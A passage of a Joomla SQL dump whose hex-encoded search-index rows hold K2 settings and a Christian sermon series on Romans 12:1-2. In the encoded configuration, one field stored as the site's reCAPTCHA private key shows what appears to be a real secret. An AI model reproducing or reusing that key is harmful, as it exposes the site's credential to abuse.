31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2239223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a32303a2231393a636f72726563742d63687269737469616e223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a33383a22636f6d706f6e656e742f6b322f6974656d2f31392d636f72726563742d63687269737469616e223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3139223b733a353a22726f757465223b733a35373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31393a636f72726563742d63687269737469616e223b733a353a227469746c65223b733a39313a22486f7720746f204265206120436f72726563742043687269737469616e20696e206120576f726c64206f6620506f6c6c7574696f6e20616e64204d69787475726573202850617274203129202d20526f6d616e732031323a312d32223b733a31313a226465736372697074696f6e223b733a3339363a2220476f6420616e642074686520646576696c2068617665206265656e20656e676167656420696e20616e20616c6c2d6f75742077617220666f722074686520736f756c73206f66206d656e20666f7220612076657279206c6f6e672074696d652e20416e642061732043687269737469616e732c2077652061726520746f20626520476f64277320726570726573656e74617469766573206f6e2074686520656172746820696e2074686973207761722e205765206172652048697320736f6c64696572732e2057652068617665206265656e20656d706f77657265642077697468206d616e79206120746f6f6c20746f206272696e6720666f727468206465737472756374696f6e2075706f6e20746865206b696e67646f6d206f66206461726b6e6573732e205361646c792c20686f77657665722c20696e207468657365206d6f6465726e2074696d65732c2077652043687269737469616e732068617665206265636f6d6520696e6372656173696e676c7920636f6e667573656420696e646976696475616c732e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d32392031303a32343a3134223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d32392031303a32343a3134223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(240, 'index.php?option=com_k2&view=item&id=22', 'index.php?option=com_k2&view=item&id=22:correct', 'How To Be a Correct Christian in a World of Pollution and  Mixtures (Part 2)', ' THE ROLES A TRUE CHRISTIAN MUST PLAY: Romans 12:1-2 Last week, we studied on the problems that plague today\'s Christians and your duties in this world of pollution and mixtures. There is an urgent need for Christians to wake up to their responsibilities and stop creating confusions. There no longer exists a clear demarcation between most Christians and the rest of the world. ', '2017-06-25 14:18:25', '81a0b327a041dce3172574b7b806c50e', 1, 1, 1, '*', '2017-02-05 21:39:29', '0000-00-00 00:00:00', '2017-02-05 21:39:29', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223232223b733a353a22616c696173223b733a373a22636f7272656374223b733a373a2273756d6d617279223b733a3430323a223c703ec2a054484520524f4c4553204120545255452043485249535449414e204d55535420504c41593a20526f6d616e732031323a312d323c2f703e0d0a3c703e4c61737420c2a07765656b2c20c2a0776520c2a073747564696564206f6e207468652070726f626c656d73207468617420706c6167756520746f64617927732043687269737469616e7320616e6420796f75722064757469657320696e207468697320776f726c64206f6620706f6c6c7574696f6e20616e64206d697874757265732e20546865726520697320616e20757267656e74206e65656420666f722043687269737469616e7320746f2077616b6520757020746f20746865697220726573706f6e736962696c697469657320616e642073746f70206372656174696e6720636f6e667573696f6e732e205468657265206e6f206c6f6e67657220657869737473206120636c6561722064656d6172636174696f6e206265747765656e206d6f73742043687269737469616e7320616e64207468652072657374206f662074686520776f726c642e3c2f703e0d0a223b733a343a22626f6479223b733a373030323a220d0a3c703e4c6574206d652061736b20796f752074686973207175657374696f6e3b20c2a061726520796f75206120546865726d6f6d657465722043687269737469616e206f72206120546865726d6f737461742043687269737469616e3f20446f20796f75206368616e67652074686520776f726c642061726f756e6420796f75206f7220796f7520656e64206368616e67696e6720696e746f2074686520776f726c642061726f756e6420796f753f2041736b20796f757273656c662074686973206d6f726e696e672e204173207765277665207365656e20736f206661722c2077652061732043687269737469616e7320c2a061726520746f20726570726573656e7420c2a0476f64277320676c6f727920746f2074686520776f726c642c20616e6420696e20646f696e6720746869732c20746865726520617265206d616e7920726f6c657320476f64206578706563747320757320746f20706c617920c2a06f6e2065617274682e20c2a04c657420676f2061206c6974746c65206675727468657220746f646179206279206c6f6f6b696e6720c2a061742074686520726f6c657320c2a06120747275652043687269737469616e20c2a073686f756c6420706c61793a3c2f703e0d0a3c703e3c7374726f6e673e312e596f752041726520546f2042652041204d616e2f576f6d616e204f6620477265617420c2a046616974683c2f7374726f6e673e2e20486562726577732031313a332c20526f6d616e732031303a3137202c4a6f686e20353a2031342d31353c2f703e0d0a3c703e496e20746865206269626c652c2077652068656172206d616e792073746f72696573206f66206772656174206d656e206f6620666169746820616e64206d656e206f662067726561742066616974682e2041732043687269737469616e732c20c2a020476f64206861732063616c6c656420c2a0757320746f2066756e6374696f6e206173206d656e206f6620677265617420c2a0666169746820c2a0696e2074686520c2a0776f726c642e20c2a0466169746820c2a069732074686520c2a0626173696320c2a0666f756e646174696f6e20c2a06f6e2077686963682043687269737469616e69747920c2a020c2a072657374732e20c2a0466169746820c2a0697320c2a074686520c2a073747275637475726520c2a0206f6e20776869636820c2a07765207374616e6420c2a061732043687269737469616e733b20c2a020697420c2a0697320627920666169746820746861742077652063616e2070726f7065726c792061636365707420476f64277320c2a020776f7264207468726f75676820746865204269626c652c20c2a07468726f756768204869732073657276616e747320616e64206469726563746c7920746f206f7572206865617274732e20c2a0412043687269737469616e20c2a077686f20646f65736e277420c2a077616c6b20696e206661697468206973206c696b652061206d616e2077686f20646f65736e277420c2a06b6e6f77206865277320612068756d616e206265696e6720616e64207370656e647320686973206c696665206c6976696e67206c696b6520616e20616e696d616c2e20416e6f7468657220726561736f6e207765206e65656420666169746820c2a069732062656361757365206974206973206f7572207072657363726962656420c2a06d65616e73206f666c6976696e67206f6e2074686520656172746820486162616b6b756b20c2a0323a3720c2a07361797320224265686f6c642c2068697320736f756c207768696368206973206c6966746564207570206973206e6f74207570726967687420696e2068696d3a2042757420746865206a75737420c2a07368616c6c206c697665206279206869732066616974682e2220c2a045766572797468696e6720796f7520c2a06e65656420c2a0746f2066756c66696c6c20c2a0796f757220c2a0646976696e6520c2a064657374696e7920c2a0746f2074686520c2a066756c6c65737420c2a0697320c2a0616c726561647920617661696c61626c6520c2a0666f7220796f752e20416c6c20796f75206e65656420746f20646f20697320746f207265616368206f757420696e20666169746820616e6420636c61696d2069742e2061206c6f6f6b20617420686f7720746f206163717569726520c2a0616e6420646576656c6f7020c2a06f75722066616974682e20537461727420c2a070757474696e6720c2a0666169746820c2a0696e746f20c2a070726163746963652e20c2a0436f6e736964657220c2a020746869732c20696620796f752077616e7420746f206c6561726e20686f7720746f20647269766520616e6420616c6c20796f7520646f206973207370656e6420796f75722074696d652072656164696e6720746865205468656f7279206f662044726976696e672c20c2a0796f75276c6c20c2a06e65766572207265616c6c7920c2a06b6e6f7720686f7720746f20647269766520756e74696c20796f7520676574206f757420796f757273656c6620616e6420647269766520c2a061206361722e20536f20616c736f2c20c2a0746f20646576656c6f7020c2a0796f75722066616974682c20c2a0796f75206d757374206c6561726e20c2a0746f207075742065766572797468696e6720c2a0796f7527766520686561726420c2a0696e746f20707261637469636520c2a0696e20796f7572206461696c7920616374697669746965732e3c2f703e0d0a3c703e3c7374726f6e673e322e596f752061726520546f2042652041204d696e6973746572204f662054686520476f7370656c3c2f7374726f6e673e3c2f703e0d0a3c703e546f20626520c2a061206d696e7374657220c2a06f662074686520c2a0676f7370656c20c2a020646f65736e277420c2a06e65636573736172696c7920c2a06d65616e20c2a0796f75276c6c206f6666696369616c6c79206265636f6d65206120706173746f722c20627574206c696b652077652073617720696e207468652070726576696f757320636861707465722c2065766572792043687269737469616e20c2a077617320676976656e20746865207072696d61727920636f6d6d697373696f6e20c2a0746f2077696e20736f756c7320c2a0666f722048696d2c20c2a0776865726576657220c2a0746865792066696e64207468656d73656c76657320c2a06f6e207468652066616365206f66207468652065617274682e20546865206465736372697074696f6e7320c2a06f66207468697320c2a0726f6c652063616e20626520666f756e6420696e204d61747468657720c2a032383a31392d323020c2a020616e64204d61726b20c2a031363a31352d31382e20c2a020c2a05468697320c2a0706f696e7420c2a077617320c2a06465616c7420c2a020657874656e736976656c7920c2a0207769746820c2a0696e20c2a07468652070726576696f757320c2a0636861707465722e3c2f703e0d0a3c703e3c7374726f6e673e33202e596f752041726520546f20426520416e20496e746572636573736f722e457068657369616e7320363a31383c2f7374726f6e673e3c2f703e0d0a3c703e4e6f206d617474657220776865726520796f752066696e6420796f757273656c66206f6e207468652066616365206f66207468652065617274682c20c2a0796f75206d75737420626520c2a020726561647920c2a020746f20c2a07072617920c2a020616c776179732e20c2a020c2a050726179657220c2a020697320c2a02074686520c2a0207072696d61727920c2a020c2a0746f6f6c20c2a0206f6620636f6d6d756e69636174696f6e20c2a07769746820476f6420c2a0666f722075732061732043687269737469616e7320c2a0616e6420c2a0697427732065787472656d656c7920696d706f7274616e7420c2a0666f7220c2a0796f7520c2a0746f20c2a0646576656c6f7020c2a0796f757220c2a0696e746572636573736f727920c2a0206162696c6974792e20c2a0417320612043687269737469616e2c20c2a020697420c2a0697320c2